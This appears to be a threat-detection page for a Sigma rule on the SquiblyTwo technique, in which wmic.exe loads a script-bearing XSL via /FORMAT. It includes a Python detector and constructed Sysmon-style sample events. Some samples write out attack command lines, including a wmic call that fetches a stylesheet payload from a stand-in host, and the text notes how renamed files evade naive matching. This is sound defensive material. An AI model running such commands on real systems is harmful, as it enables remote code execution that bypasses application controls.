WMIC Loading Scripting Libraries (06ce37c2-61ab-4f05-9ff5-b1a96d18ae32)
Detects threat actors proxy-executing code and bypassing application controls by invoking wmic.exe with the /FORMAT switch to download and load an XSL stylesheet that embeds script (JScript, VBScript, etc.); wmic parses the stylesheet and the embedded script runs in the wmic process.
It can be an indicator of the SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
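The following is an added example, not the Sigma rule's own YAML or code, showing how the detection logic described above can be applied to Sysmon-style process-creation events (Image, OriginalFileName, CommandLine). It matches wmic.exe whose command line carries a /format: or -format: argument and then drops the stylesheet names wmic ships with (list, table, csv, etc., an allowlist constructed here and not claimed to be exhaustive), because those are ordinary output formatting and would otherwise flood the rule with false positives. The sample events, the hostname and the file paths are constructed for the example. Note that the third sample deliberately uses a .txt extension: wmic loads whatever file /format: points to as XSL, so matching on ".xsl" alone misses renamed payloads.

```python
import re
from typing import Dict, List, Optional, Tuple

# Stylesheet keywords wmic resolves from %WINDIR%\System32\wbem\*.xsl.
# Constructed allowlist for this example; extend it from the wbem directory of a reference host.
BUILTIN_FORMATS = {
    "list", "table", "csv", "xml", "rawxml", "mof", "value",
    "hform", "htable", "texttable", "textvaluelist",
}

# /format:<arg> or -format:<arg>, case-insensitive; the argument may be single- or double-quoted.
FORMAT_RE = re.compile(r"""[/-]format[:=]\s*("([^"]*)"|'([^']*)'|(\S+))""", re.IGNORECASE)


def is_wmic(event: Dict[str, str]) -> bool:
    """Selection on the binary, by path suffix or by PE OriginalFileName (survives renaming)."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\wmic.exe") or original == "wmic.exe"


def format_argument(cmdline: str) -> Optional[str]:
    """Return the value passed to /format (or -format), or None if the switch is absent."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return m.group(2) or m.group(3) or m.group(4) or ""


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return None for benign events, otherwise a short reason string for the alert."""
    if not is_wmic(event):
        return None
    arg = format_argument(event.get("CommandLine", ""))
    if arg is None:
        return None
    name = arg.strip().lower()
    # wmic appends .xsl to keywords itself, so "/format:list" and "/format:list.xsl" are the same stylesheet.
    if name.endswith(".xsl"):
        name = name[:-4]
    if name in BUILTIN_FORMATS:
        return None
    # Remote stylesheet (HTTP(S) URL or UNC path): the classic SquiblyTwo download-and-execute shape.
    if re.match(r"https?://", name) or name.startswith("\\\\"):
        return "remote stylesheet: " + arg
    # Anything else is a local file outside wmic's own stylesheets, whatever its extension.
    return "non-builtin stylesheet: " + arg


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Run the rule over a batch of events and return (CommandLine, reason) for each hit."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason is not None:
            hits.append((event.get("CommandLine", ""), reason))
    return hits


# Constructed sample events in Sysmon Event ID 1 style; none are real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption /format:list"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic os get /format:"https://example.invalid/payload.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process get /FORMAT:C:\Users\Public\update.txt"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo /format:evil.xsl"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic process list brief"},
]

if __name__ == "__main__":
    for cmdline, reason in detect(SAMPLE_EVENTS):
        print(f"ALERT {reason} <- {cmdline}")
```

Only the URL and the renamed local file produce alerts; the built-in "/format:list" call, the cmd.exe event that merely contains the string, and the wmic call without /format are all ignored. When deploying this against real telemetry, pair it with the DNS or proxy log for the download and with the wmic.exe network connection event, since the stylesheet fetch itself is the most reliable corroborating artifact.
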
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| XSL Script Processing - T1220 (ebbe170d-aa74-4946-8511-9921243415a3) | Attack Pattern | WMIC Loading Scripting Libraries (06ce37c2-61ab-4f05-9ff5-b1a96d18ae32) | Sigma-Rules | 1 |